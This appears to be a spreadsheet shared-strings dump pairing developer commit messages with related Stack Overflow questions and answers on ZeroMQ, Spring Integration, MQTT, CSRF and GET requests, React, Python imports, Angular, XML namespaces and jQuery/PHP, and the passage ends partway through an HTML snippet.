  <si>
    <t>Yeah... I see you point. This a bug: we must postpone a his.sendSocketConfigurer usage until really an interaction happens with a socket. I'll fix that soon enough.
For now on a couple remarks for your config:
You must not call an afterPropertiesSet() yourself. Let the Spring application context to manage its callbacks for you!
You must not subscribe into the MessageChannel in its bean definition. Instead consider to have a @ServiceActivator(inputChannel = "zeroMqPubSubChannel"). See more info in docs: https://docs.spring.io/spring-integration/reference/html/messaging-endpoints.html#service-activator
Unfortunately there is no way to pass that customization into an internal ZMQ.Socket instance...
UPDATE
The working test with Curve auth in ZeroMQ:
@Test
void testPubSubWithCurve() throws InterruptedException {
	ZContext CONTEXT = new ZContext();
	new ZAuth(CONTEXT).configureCurve(ZAuth.CURVE_ALLOW_ANY).setVerbose(true);
	ZMQ.Curve.KeyPair frontendKeyPair = ZMQ.Curve.generateKeyPair();
	ZMQ.Curve.KeyPair backendKeyPair = ZMQ.Curve.generateKeyPair();
	ZeroMqProxy proxy = new ZeroMqProxy(CONTEXT, ZeroMqProxy.Type.SUB_PUB);
	proxy.setBeanName("subPubCurveProxy");
	proxy.setFrontendSocketConfigurer(socket -&gt; {
		socket.setZAPDomain("global".getBytes());
		socket.setCurveServer(true);
		socket.setCurvePublicKey(frontendKeyPair.publicKey.getBytes());
		socket.setCurveSecretKey(frontendKeyPair.secretKey.getBytes());
	});
	proxy.setBackendSocketConfigurer(socket -&gt; {
		socket.setZAPDomain("global".getBytes());
		socket.setCurveServer(true);
		socket.setCurvePublicKey(backendKeyPair.publicKey.getBytes());
		socket.setCurveSecretKey(backendKeyPair.secretKey.getBytes());
	});
	proxy.afterPropertiesSet();
	proxy.start();
	ZeroMqChannel channel = new ZeroMqChannel(CONTEXT, true);
	channel.setZeroMqProxy(proxy);
	channel.setBeanName("testChannelWithCurve");
	channel.setSendSocketConfigurer(socket -&gt; {
		ZCert clientCert = new ZCert();
		socket.setCurvePublicKey(clientCert.getPublicKey());
		socket.setCurveSecretKey(clientCert.getSecretKey());
		socket.setCurveServerKey(frontendKeyPair.publicKey.getBytes());
	});
	channel.setSubscribeSocketConfigurer(socket -&gt; {
				ZCert clientCert = new ZCert();
				socket.setCurvePublicKey(clientCert.getPublicKey());
				socket.setCurveSecretKey(clientCert.getSecretKey());
				socket.setCurveServerKey(backendKeyPair.publicKey.getBytes());
			}
	);
	channel.setConsumeDelay(Duration.ofMillis(10));
	channel.afterPropertiesSet();
	BlockingQueue&lt;Message&lt;?&gt;&gt; received = new LinkedBlockingQueue&lt;&gt;();
	channel.subscribe(received::offer);
	channel.subscribe(received::offer);
	await().until(() -&gt; proxy.getBackendPort() &gt; 0);
	// Give it some time to connect and subscribe
	Thread.sleep(1000);
	GenericMessage&lt;String&gt; testMessage = new GenericMessage&lt;&gt;("test1");
	assertThat(channel.send(testMessage)).isTrue();
	Message&lt;?&gt; message = received.poll(10, TimeUnit.SECONDS);
	assertThat(message).isNotNull().isEqualTo(testMessage);
	message = received.poll(10, TimeUnit.SECONDS);
	assertThat(message).isNotNull().isEqualTo(testMessage);
	channel.destroy();
	proxy.stop();
	CONTEXT.close();
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a GitHub Actions workflow to generate documentation using Sphinx. I use &lt;code&gt;ubuntu-22.04&lt;/code&gt; image for that and I install &lt;code&gt;ghostscript&lt;/code&gt; because it is used somewhere internally to convert a PDF image to a PNG image.&lt;/p&gt;
&lt;p&gt;Somehow, it works on my machine (which also runs Ubuntu 22.04 and has the same version of Ghostscript, 9.55.0). However, ti fails on the GitHub actions with an error that I do not quite understand:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
Extension error:
convert exited with error:
[stderr]
b&amp;quot;Error: /undefined in https:\nOperand stack:\n   (3010)\nExecution stack:\n   %interp_exit   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--   --nostringval--   false   1   %stopped_push   1990   1   3   %oparray_pop   1989   1   3   %oparray_pop   1977   1   3   %oparray_pop   1833   1   3   %oparray_pop   --nostringval--   %errorexec_pop   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--\nDictionary stack:\n   --dict:771/1123(ro)(G)--   --dict:0/20(G)--   --dict:75/200(L)--\nCurrent allocation mode is local\nCurrent file position is 14\nGPL Ghostscript 9.55.0: Unrecoverable error, exit code 1\nconvert-im6.q16: no images defined `/home/runner/work/open-interfaces/open-interfaces/docs/build/doctrees/images/ivp_burgers_soln_scipy_ode_dopri5.png' @ error/convert.c/ConvertImageCommand/3229.\n&amp;quot;
[stdout]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The original PDF image is of course in the repository, so I do not understand this &amp;quot;no image defined&amp;quot;. Also, I do not quite understand what is &lt;code&gt;/undefined in https:&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;Does anyone know how to resolve this issue? Thanks!&lt;/p&gt;
&lt;p&gt;UPDATE: It turned out that the PDF file was just a pointer file (due to Git LFS system), and was not properly checked out.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C116</t>
  </si>
  <si>
    <t>+activity component for the app --- otherwise it might not receive br
oadcast intents: http://stackoverflow.com/questions/17181241/broadcast-receiver-not-working-when-registered-via-manifest</t>
  </si>
  <si>
    <t>Incoming call broadcast receiver not working (Android 4.1) they said that as of android 4.1 the system no longer sends broadcasts to app components without an activity...is this true?
That has been the case since Android 3.1. Something must explicitly run one of your components before your manifest-registered
BroadcastReceivers
will work, and the typical solution for this is to have an activity (the same one that provides app configuration, help, license agreements, etc.) that the user launches.
Please read
the Android 3.1 release notes
for more.</t>
  </si>
  <si>
    <t xml:space="preserve">When would you use a bigtabe/simpledb database vs a Relational database?
</t>
  </si>
  <si>
    <t>C117</t>
  </si>
  <si>
    <t>GH-3697: Various lifecycle fixed for MQTT v5 CAs
Fixes #3697
SO: https://stackoverflow.com/questions/70374046/spring-integration-mqtt-failed-to-start-app-when-the-network-is-disconnected
* Add `mqttClient.disconnect()` to `Mqttv5PahoMessageDrivenChannelAdapter.doStop()` - the `doStart()` does `connect()`
* Add `Mqttv5PahoMessageDrivenChannelAdapter.destroy()` impl to close `mqttClient`
* Fix `Mqttv5PahoMessageHandler.doStart()` to not re-throw an exception on connection.
Emit an `MqttConnectionFailedEvent` and log error instead
* Fix `Mqttv5PahoMessageHandler.destroy()` to call `mqttClient.close(true)` for better resources clean up
* Improve MQTT v5 components Javadocs and add a reconnect note into `mqtt.adoc`</t>
  </si>
  <si>
    <t>In the inbound bean, adapter.setAutoStartup(false) will prevent the context from starting the adapter during initialization.
You can then start() the adapter manually (in a try/catch block, presumably).</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to read a RAR archive that has encrypted files names and data. Reading RAR files that have encrypted data but not file names works just fine:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Archive := archive_read_new();
archive_read_support_format_zip(Archive);
archive_read_support_filter_all(Archive);
archive_read_add_passphrase(Archive, PAnsiChar(AnsiString('test')));
R := archive_read_open_filename(Archive, PAnsiChar(FileName), 0);
if archive_read_has_encrypted_entries(Archive) = 1 then ShowMessage('Encrypted');
R := archive_read_next_header(Archive, Entry);
if R = ARCHIVE_FATAL then
raise Exception.CreateFmt('Error reading header (%d)', [R]); 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the last exception is raised. Am I missing a function?&lt;/p&gt;
&lt;p&gt;The code above is in Pascal but I tagged C/C++ since libarchive is written in C/C++.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C118</t>
  </si>
  <si>
    <t>Remove CSRF error handling
We do not have any POST routes in this application, nor do our
GET requests change any state. Therefore, we shouldn't need any
CSRF protection. Arguably someone could come along and add a POST
request but I think that we are OK to take that risk.
See https://stackoverflow.com/questions/12094361/csrf-protection-for-non-form-post-requests
for security aspect of this.
Equally app/templates/components/page_footer.html is not used
anywhere so we can delete that.
Given we don't need CSRF protection, we therefore don't need
Flask-WTF installed so that package can be removed.</t>
  </si>
  <si>
    <t>OWASP says this about CSRF and GET requests:
The ideal solution is to only include the CSRF token in POST requests and modify server-side actions that have state changing affect to only respond to POST requests. This is in fact what the RFC 2616 requires for GET requests. If sensitive server-side actions are guaranteed to only ever respond to POST requests, then there is no need to include the token in GET requests.
Also, OWASP notes:
Many implementations of this control include the challenge token in GET (URL) requests  [...] while this control does help mitigate the risk of CSRF attacks, the unique per-session token is being exposed for GET requests. CSRF tokens in GET requests are potentially leaked at several locations: browser history, HTTP log files, network appliances that make a point to log the first line of an HTTP request, and Referrer headers if the protected site links to an external site.
The trouble here is that if a user's token is leaked, you're still vulnerable - and it's all too easy to leak the token. I'm not sure that there's a good answer to your question that doesn't involve converting all of those GET requests to POST requests.
It's worth noting that the Viewstate feature in ASP.NET WebForms does offer some protection against CSRF, though it's very limited - in fact, it also only protects POSTback requests.
To state this more simply, you shouldn't use a GET request as an entry point to any function that does something beyond return a read only resource for a browser to render. So don't have an AJAX script make a GET based call to a URL like transferMoney.aspx?fromAcct=xyz&amp;toAcct=abc&amp;amount=20.
The HTTP specification states explicitly that HTTP GET requests should not have side effects. It's considered best practice to keep your GET requests idempotent whenever possible.
I've written an article about protecting ASP.NET MVC against CSRF, it spells out a practical approach to applying the AntiForgeryToken to POST controller methods on your site.</t>
  </si>
  <si>
    <t xml:space="preserve">I am a AS3 novice learning PureMVC and want to write code following best practices so that any other AS3 developer can pick up my code and easily understand what I did, I am tempted to do stuff as I would in JavaScript or Asp.Net/C#, but I have a feeling that might not be the best approach.
Thoughts? Links?
</t>
  </si>
  <si>
    <t>C119</t>
  </si>
  <si>
    <t>Refactor slides to use a composing function
See: http://stackoverflow.com/questions/30259405/react-es6-component-inheritance-working-but-not-recommended</t>
  </si>
  <si>
    <t>The Facebook team recommends 'using idiomatic JavaScript concepts' when writing React code, and since there is no mixin support for ES6 classes, one should just use composition (since you are just making use of idiomatic Javascript functions).
In this case, you can have a composeModal function that takes a component and returns it wrapped in a higher-order, container component. This higher-order component will contain whatever logic, state, and props you want passed down to all of its children.
export default function composeModal(Component){
   class Modal extends React.Component {
       constructor(props){
           super(props)
           this.state = {/* inital state */}
       }
       render() {
           // here you can pass down whatever you want 'inherited' by the child
           return &lt;Component {...this.props} {..this.state}/&gt;
       }
   }
   Modal.propTypes = {
      // Re-used propTypes
      ...
   };
   return Modal
}
Then you can use the composition function like so:
import composeModal from './composeModal';
class RobotRetroComponent extends React.Component {
    constructor(props) {
        super(props);
        this.displayName = 'Retro Robot';
        // Load model here and set geometry &amp; material
        ...
    }
    render(){
        return /* Your JSX here */
    }
}
export default composeModal(RobotRetroComponent);</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a code and found out that:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@client.on(events.NewMessage(from_users=channels))
    async def main(event):
        print(event.message)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@client.on(events.NewMessage(chats=channels))
    async def main(event):
        print(event.message)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;work exactly the same. What is the difference in these args then?&lt;/p&gt;
&lt;p&gt;It has no difference so I'm interested how it works&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C12</t>
  </si>
  <si>
    <t>Renamed "cli" -&gt; "biotrainer" and moved to base directory
Making the main script more accessible and avoiding sort of an anti-pattern (executable script in module directory, https://stackoverflow.com/questions/16981921/relative-imports-in-python-3)</t>
  </si>
  <si>
    <t>unfortunately, this module needs to be inside the package, and it also needs to be runnable as a script, sometimes. Any idea how I could achieve that?
It's quite common to have a layout like this...
main.py
mypackage/
    __init__.py
    mymodule.py
    myothermodule.py
...with a
mymodule.py
like this...
#!/usr/bin/env python3
# Exported function
def as_int(a):
    return int(a)
# Test function for module  
def _test():
    assert as_int('1') == 1
if __name__ == '__main__':
    _test()
...a
myothermodule.py
like this...
#!/usr/bin/env python3
from .mymodule import as_int
# Exported function
def add(a, b):
    return as_int(a) + as_int(b)
# Test function for module  
def _test():
    assert add('1', '1') == 2
if __name__ == '__main__':
    _test()
...and a
main.py
like this...
#!/usr/bin/env python3
from mypackage.myothermodule import add
def main():
    print(add('1', '1'))
if __name__ == '__main__':
    main()
...which works fine when you run
main.py
or
mypackage/mymodule.py
, but fails with
mypackage/myothermodule.py
, due to the relative import...
from .mymodule import as_int
The way you're supposed to run it is...
python3 -m mypackage.myothermodule
...but it's somewhat verbose, and doesn't mix well with a shebang line like
#!/usr/bin/env python3
.
The simplest fix for this case, assuming the name
mymodule
is globally unique, would be to avoid using relative imports, and just use...
from mymodule import as_int
...although, if it's not unique, or your package structure is more complex, you'll need to include the directory containing your package directory in
PYTHONPATH
, and do it like this...
from mypackage.mymodule import as_int
...or if you want it to work "out of the box", you can frob the
PYTHONPATH
in code first with this...
import sys
import os
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.dirname(SCRIPT_DIR))
from mypackage.mymodule import as_int
It's kind of a pain, but there's a clue as to why in
an email
written by a certain Guido van Rossum...
I'm -1 on this and on any other proposed twiddlings of the
__main__
machinery. The only use case seems to be running scripts that happen
to be living inside a module's directory, which I've always seen as an
antipattern. To make me change my mind you'd have to convince me that
it isn't.
Whether running scripts inside a package is an antipattern or not is subjective, but personally I find it really useful in a package I have which contains some custom wxPython widgets, so I can run the script for any of the source files to display a
wx.Frame
containing only that widget for testing purposes.</t>
  </si>
  <si>
    <t xml:space="preserve">In a database-centric application that is designed for multiple clients, I've always thought it was "better" to use a single database for ALL clients - associating records with proper indexes and keys.  In listening to the Stack Overflow podcast, I heard Joel mention that FogBugz uses one database per client (so if there were 1000 clients, there would be 1000 databases).  What are the advantages of using this architecture?
I understand that for some projects, clients need direct access to all of their data - in such an application, it's obvious that each client needs their own database.  However, for projects where a client does not need to access the database directly, are there any advantages to using one database per client?  It seems that in terms of flexibility, it's much simpler to use a single database with a single copy of the tables.  It's easier to add new features, it's easier to create reports, and it's just easier to manage.
I was pretty confident in the "one database for all clients" method until I heard Joel (an experienced developer) mention that his software uses a different approach -- and I'm a little confused with his decision...
I've heard people cite that databases slow down with a large number of records, but any relational database with some merit isn't going to have that problem - especially if proper indexes and keys are used.
Any input is greatly appreciated!
</t>
  </si>
  <si>
    <t>C120</t>
  </si>
  <si>
    <t>Added lazy DI implementation, problems with standard DI outlined here: 
https://stackoverflow.com/questions/10588659/dependency-injection-pulling-required-components-when-they-are-actually-needed</t>
  </si>
  <si>
    <t>I've been thinking about this problem a lot lately in planning of a major project that I want to do as right as humanly possible (stick to LoD, no hard coded dependencies, etc).  My first thought was the "Inject a factory" approach as well, but I'm not sure that's the way to go.  The Clean Code talks from Google made the claim that if you reach through an object to get the object you really want then you're violating the LoD.  That would seem to rule out the idea of injecting a factory, because you have to reach through the factory to get what you really want.  Maybe I've missed some point there that makes it okay, but until I know for sure I'm pondering other approaches.
How do you do the function injection?  I'd imagine you're passing in a callback that does the instantiation of the object you want, but a code example would be nice.
If you could update your question with code examples of how you do the three styles you mentioned it might be useful.  I'm especially keen to see "injecting the injector" even if it is an antipattern.</t>
  </si>
  <si>
    <t xml:space="preserve">My understanding is that C/C++ produces native code to run on a particular machine architecture.  Conversely, languages like Java and C# run on top of a virtual machine which abstracts away the native architecture.  Logically it would seem impossible for Java or C# to match the speed of C++ because of this intermediate step, however I've been told that the latest compilers ("hot spot") can attain this speed or even exceed it.
Perhaps this is more of a compiler question than a language question, but can anyone explain in plain English how it is possible for one of these virtual machine languages to perform better than a native language?
</t>
  </si>
  <si>
    <t>C121</t>
  </si>
  <si>
    <t>inkbar: fix inkbar does not move on page load.
https://stackoverflow.com/questions/47465548/angular-sub-component-style-does-not-change-until-next-ngafterviewchecked</t>
  </si>
  <si>
    <t>Angular version: 5.0.3
I have put my code
here
.
I have made a custom inkbar module, and imported it to the app. I use
&lt;lib-inkbar [nextEle]="inkbarSubject" [color]="inkbarColor"&gt;&lt;/lib-inkbar&gt;
...to install it in my
app.component
.
The inkbar under the navigation menu tabs is expected to automatically go in position where router link is currently active. (And this is done by getting the width and offset left of a given element, and move to it.) For example, at the beginning, "/index" is active, so "Index" tab has a class "active", and inkbar should translate under it.
I have achieved this by putting the code in Angular's
ngAfterViewChecked
life-cycle.
inkbarMove()
tells inkbar where to go by telling it the element (i.e. the active nav tab).
ngAfterViewChecked() {
  this.navMenus = this.ul.nativeElement.children;
  let actMenu = this.getAvtiveMenu();
  if (actMenu) {
    this.inkbarMove(actMenu);
  }
}
inkbarMove = (ele: HTMLBaseElement | MouseEvent) =&gt; {
  if (ele instanceof MouseEvent) {
    ele = ele.target as HTMLBaseElement;
  }
  this.inkbarSubject.next(ele);
};
However, this works only after next
ngAfterViewChecked()
fires. When page
first loads
, the inkbar will stay
{width: 0px; left: 0px}
style, as initial default value, no matter how many times I tell it to "Move" (I even wrote a for-loop, which made my browser crash, but still didn't work lol). It will only starts to move after I press the
button
and manually call
ngAfterViewChecked()
again.
Does someone know what is going on here?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to pull data out of a file in order to split it.
I need the Data element, the Header, Reference and Sender that
is being used for each splitted file, which will contain these elements
plus one Item element per file.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Data xmlns=&amp;quot;http://foo.schema&amp;quot;&amp;gt;
    &amp;lt;Header&amp;gt;
        &amp;lt;Contact&amp;gt;
            &amp;lt;Id&amp;gt;MS0199&amp;lt;/Id&amp;gt;
        &amp;lt;/Contact&amp;gt;
        &amp;lt;ContactRef&amp;gt;GA&amp;lt;/ContactRef&amp;gt;
    &amp;lt;/Header&amp;gt;
    &amp;lt;Reference&amp;gt;RA0122&amp;lt;/Reference&amp;gt;
    &amp;lt;Sender&amp;gt;
        &amp;lt;SubNo&amp;gt;19223&amp;lt;/SubNo&amp;gt;
    &amp;lt;/Sender&amp;gt;
    &amp;lt;Item id=&amp;quot;TA001&amp;quot;&amp;gt;
        &amp;lt;Code&amp;gt;IAT-0100&amp;lt;/Code&amp;gt;
    &amp;lt;/Item&amp;gt;
    &amp;lt;Item id=&amp;quot;TA054&amp;quot;&amp;gt;
        &amp;lt;Code&amp;gt;MFF-2910&amp;lt;/Code&amp;gt;
    &amp;lt;/Item&amp;gt; 
&amp;lt;/Data&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm extracting the &amp;quot;Header data&amp;quot; (&lt;code&gt;Data&lt;/code&gt;, &lt;code&gt;Header&lt;/code&gt;, &lt;code&gt;Reference&lt;/code&gt;, &lt;code&gt;Sender&lt;/code&gt;) by this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        using (XmlReader reader = XmlReader.Create(xmlFile))
        {
            reader.MoveToContent();
            while (reader.Read())
            {
                if (reader.NodeType == XmlNodeType.Element &amp;amp;&amp;amp; reader.Name == &amp;quot;Header&amp;quot;)
                {
                    hdrval = XElement.Load(reader.ReadSubtree());
                }
                if (reader.NodeType == XmlNodeType.Element &amp;amp;&amp;amp; reader.Name == &amp;quot;Reference&amp;quot;)
                {
                    refval = XElement.Load(reader.ReadSubtree());
                }
                if (reader.NodeType == XmlNodeType.Element &amp;amp;&amp;amp; reader.Name == &amp;quot;Sender&amp;quot;)
                {
                    sndval = XElement.Load(reader.ReadSubtree());
                }
                if (reader.NodeType == XmlNodeType.Element &amp;amp;&amp;amp; reader.Name == &amp;quot;Item&amp;quot;)
                {
                    break;
                }
            }
        }
        XNamespace ns = &amp;quot;http://foo.schema&amp;quot;;
        XElement Header = new(ns + &amp;quot;Data&amp;quot;,
            hdrval,
            refval,
            sndval,
        );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Problem is that when I look at the resulting output it now says:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Data xmlns=&amp;quot;http://foo.schema&amp;quot;&amp;gt;
    &amp;lt;Header xmlns=&amp;quot;http://foo.schema&amp;quot;&amp;gt;
        &amp;lt;Contact&amp;gt;
            &amp;lt;Id&amp;gt;MS0199&amp;lt;/Id&amp;gt;
        &amp;lt;/Contact&amp;gt;
        &amp;lt;ContactRef&amp;gt;GA&amp;lt;/ContactRef&amp;gt;
    &amp;lt;/Header&amp;gt;
    &amp;lt;Reference xmlns=&amp;quot;http://foo.schema&amp;quot;&amp;gt;RA0122&amp;lt;/Reference&amp;gt;
    &amp;lt;Sender xmlns=&amp;quot;http://foo.schema&amp;quot;&amp;gt;
        &amp;lt;SubNo&amp;gt;19223&amp;lt;/SubNo&amp;gt;
    &amp;lt;/Sender&amp;gt;
&amp;lt;/Data&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way to stop it from injecting the xmlns definition on every single
child I pull out? I want it on the &lt;code&gt;Data&lt;/code&gt; element seeing as it's the root element
but not on every single child.&lt;/p&gt;
&lt;p&gt;It works if I use LINQ with XElement, however the file can be multiple GB's in size
so I'm trying to use the XmlReader in order to stream the file rather than loading the
whole thing at once.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C122</t>
  </si>
  <si>
    <t>[client] implemented the componentDidUpdate lifecycle method in the S
econdaryProfile component
- This allows the SecondaryProfile to re-render with the profile information for a different profile if a the search bar is used to navigate from one profile to another
- References:
 - https://stackoverflow.com/a/48139357/15102631</t>
  </si>
  <si>
    <t>As Product component is already loaded it will not reload. You have to handle new product id in the below method of component
componentWillReceiveProps(nextProps) {
if(nextProps.match.params.name.product == oldProductId){
  return;
}else {
 //fetchnewProduct and set state to reload
}
With latest version of react(16.3.0 onwards)
static getDerivedStateFromProps(nextProps, prevState){
   if(nextProps.productID !== prevState.productID){
     return { productID: nextProps.productID};
  } 
  else {
     return null;
  }
}
componentDidUpdate(prevProps, prevState) {
  if(prevProps.productID !== this.state.productID){
     //fetchnewProduct and set state to reload
  }
}</t>
  </si>
  <si>
    <t>[client] implemented the componentDidUpdate lifecycle method in the S
econdaryProfile component
- This allows the SecondaryProfile to re-render with the profile information for a different profile if a the search bar is used to navigate from one profile to another
- References:
     - https://stackoverflow.com/a/48139357/15102631</t>
  </si>
  <si>
    <t xml:space="preserve">I'm wondering if there are any architectural frameworks out there to create desktop or standalone applications, in Java or C# for instance. It seems that there are tons of them available for web applications but I can't find many good resources on frameworks or architectural best-practices for desktop development.
Ideally I would like to know if there is any source code available of desktop applications that would be considered to have a good architecture or are built with a certain framework.
</t>
  </si>
  <si>
    <t>C123</t>
  </si>
  <si>
    <t>fix(client): nextjs + react-tooltip bug
- nextjs causes some issues with rendering the react-tooltip component
- this is due to how the page is rendered (statically)
- the fix was to have an additional state for ensuring that the tooltip is only attempted to be used once the component (the page) is fully mounted
- ref: https://stackoverflow.com/questions/64079321/react-tooltip-and-next-js-ssr-issue</t>
  </si>
  <si>
    <t>I had the same issue, I had to use state to detect when component has been mounted, and show the tooltip only after that.
P.S. You don't see the error when navigating, because the page is not rendered on server when you navigate, it's all front-end :)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two pages HTML and PHP where based on the selected option, a table and a script for that table is loaded. When adding the script in a PHP echo response, I get &lt;em&gt;&amp;quot;Undefined variable $btn in&amp;quot;&lt;/em&gt; only after adding the third section. I'm assuming it has something to do with the response or the ways its inserted. Can anyone tell me what is wrong or guide me?&lt;/p&gt;
&lt;p&gt;Why does the code stop working and error out after adding the third section of code?&lt;/p&gt;
&lt;p&gt;Once the code is working, I will secure it with PDO and prepared statements; let's focus on the question.&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;// This function is user to insert data in database
$('#btnSaveAction').on('click', function () {
    params = ''
    $('td[contentEditable=\&amp;quot;true\&amp;quot;]').each(function () {
        if ($(this).text() != '') {
            if (params != '') {
                params += '&amp;amp;';
            }
            params += $(this).data('id') + '=' + $(this).text();
        }
    });
    if (params != '') {
         alert(params);// santize data
        $.ajax({
            url: 'function.php',
            type: 'POST',
            data: params,
            success: function (response) {
                $('#ajax-response').append(response);
                $('td[contentEditable=\&amp;quot;true\&amp;quot;]').text('');
            }
        });
        return false;
    }
});
// This function is used for edit the row to make it editable
$('#tbl').on('click', '.edit', function () {
    $('#tbl').find('.save, .cancel').hide();
    $('#tbl').find('.edit').show();
    $(this).hide().siblings('.save, .cancel').show();
    $(this).closest('td').siblings().each(
        function () {
            var inp = $(this).find('input');
            if (inp.length) {
                $(this).text(inp.val());
            } else {
                var t = $(this).text();
                $(this).attr('contentEditable', 'true');
            }
        });
});
// This function is used for edit the row to make it editable
$('#tbl').on('click', '.cancel', function () {
    $('#tbl').find('.save, .cancel').hide();
    $(this).hide().siblings('.edit').show();
    $(this).closest('td').siblings().each(
        function () {
            $(this).attr('contentEditable', 'false');
            location.reload();
        });
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Once you add this, it starts to error, but it all looks correct.&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;// This function is used for saving the edit data in database
$('#tbl').on('click', '.save', function () {
    var $btn = $(this);
    $('#tbl').find('.save, .cancel').hide();
    $btn.hide().siblings('.edit').show();
    params = '';
    var id = $btn.data('id');
    $(this).closest('td').siblings().each(function () {
        $(this).attr('contentEditable', 'false');
        if (params != '') {
            params += '&amp;amp;';
        }
        params += $(this).data('id') + '=' + $(this).text();
    });
    params += '&amp;amp;id' + '=' + id;
       alert(params);// santize data
    if (params != '') {
        $.ajax({
            url: 'function.php',
            type: 'POST',
            data: params,
            success: function (response) {
                $('#ajax-response').append(response);
                // $('td[contentEditable='true']').text('');
            }
        });
        return false;
    }
});
// this ajax is using for deleting the row 
$('#tbl').on('click', '.del', function () {
    var el = this;
    var deleteid = $(this).data('id');
    console.log(deleteid);
    var confirmalert = confirm('Are you sure?');
    if (confirmalert == true) {
        $.ajax({
            url: 'function.php',
            type: 'POST',
            data: {
                id: deleteid,
                action: 'del'
            },
            success: function (response) {
                if (response == 1) {
                    // Remove row from HTML Table
                    $(el).closest('tr').css('background', 'tomato');
                    $(el).closest('tr').fadeOut(800, function () {
                        $(this).remove();
                    });
                } else {
                    alert('Invalid ID.');
                }
            }
        });
    }
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tried this&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;// using this
$(&amp;quot;#ajax-response&amp;quot;).append(response);
//but can also use this
var maincontent = document.getElementById(&amp;quot;ajax-response&amp;quot;);
maincontent.innerHTML = response;
//or this
$.getScript('asset/custom.js'); // Execute the JavaScript file
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This doesn't work either, neither does placing it before or after the HTML:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;$('script', response).each(function() {
    var script = document.createElement('script');
    script.type = 'text/javascript';
    script.text = this.innerHTML;
    document.body.appendChild(script);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;HTML:&lt;/p&gt;
&lt;pre class="lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;!DOCTYPE html&amp;gt;
&amp;lt;html lang=&amp;quot;en&amp;quot;&amp;gt;
&amp;lt;head&amp;gt;
    &amp;lt;meta charset=&amp;quot;UTF-8&amp;quot;&amp;gt;
    &amp;lt;meta http-equiv=&amp;quot;X-UA-Compatible&amp;quot; content=&amp;quot;IE=edge&amp;quot;&amp;gt;
    &amp;lt;meta name=&amp;quot;viewport&amp;quot; content=&amp;quot;width=device-width, initial-scale=1.0&amp;quot;&amp;gt;
    &amp;lt;title&amp;gt;Manager combined Console&amp;lt;/title&amp;gt;
    &amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;asset/style11.css&amp;quot;&amp;gt;
    &amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css&amp;quot;&amp;gt;
    &amp;lt;style&amp;gt;
        #btnSaveAction {
            display: inline-block;
            color: #444;
            border: 1px solid #CCC;
            background: #DDD;
            box-shadow: 0 0 5px -1px rgba(0, 0, 0, 0.2);
            cursor: pointer;
            vertical-align: middle;
            max-width: 100px;
            padding: 5px;
            text-align: center;
        }
    &amp;lt;/style&amp;gt;
    &amp;lt;script src=&amp;quot;https://code.jquery.com/jquery-1.10.2.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
    &amp;lt;script&amp;gt;
        // Load table data when a table is selected
        $(document).on('change', '#tableSelect', function() {
            var table = $(this).val();
            if (table) {
                $.ajax({
                    url: 'function77.php',
                    type: 'GET',
                    data: { table: table },
                    success: function(response) {
                        // Replace the current content with the new response
                        $(&amp;quot;#tableData&amp;quot;).html(response);
                        $('script', response).each(function() {
            var script = document.createElement('script');
            script.type = 'text/javascript';
            script.text = this.innerHTML;
            document.body.appendChild(script);
        });
                    }
                });
            } else {
                $('#tableData').html('');
            }
        });
    &amp;lt;/script&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;h1&amp;gt;Business Console&amp;lt;/h1&amp;gt;
    &amp;lt;!-- Dropdown to select table --&amp;gt;
    &amp;lt;select id=&amp;quot;tableSelect&amp;quot;&amp;gt;
        &amp;lt;option value=&amp;quot;&amp;quot;&amp;gt;Select Business&amp;lt;/option&amp;gt;
        &amp;lt;option value=&amp;quot;maploc&amp;quot;&amp;gt;Business Manager&amp;lt;/option&amp;gt;
        &amp;lt;option value=&amp;quot;reviews&amp;quot;&amp;gt;1-Location1&amp;lt;/option&amp;gt;
        &amp;lt;option value=&amp;quot;table3&amp;quot;&amp;gt;2-Location2&amp;lt;/option&amp;gt;
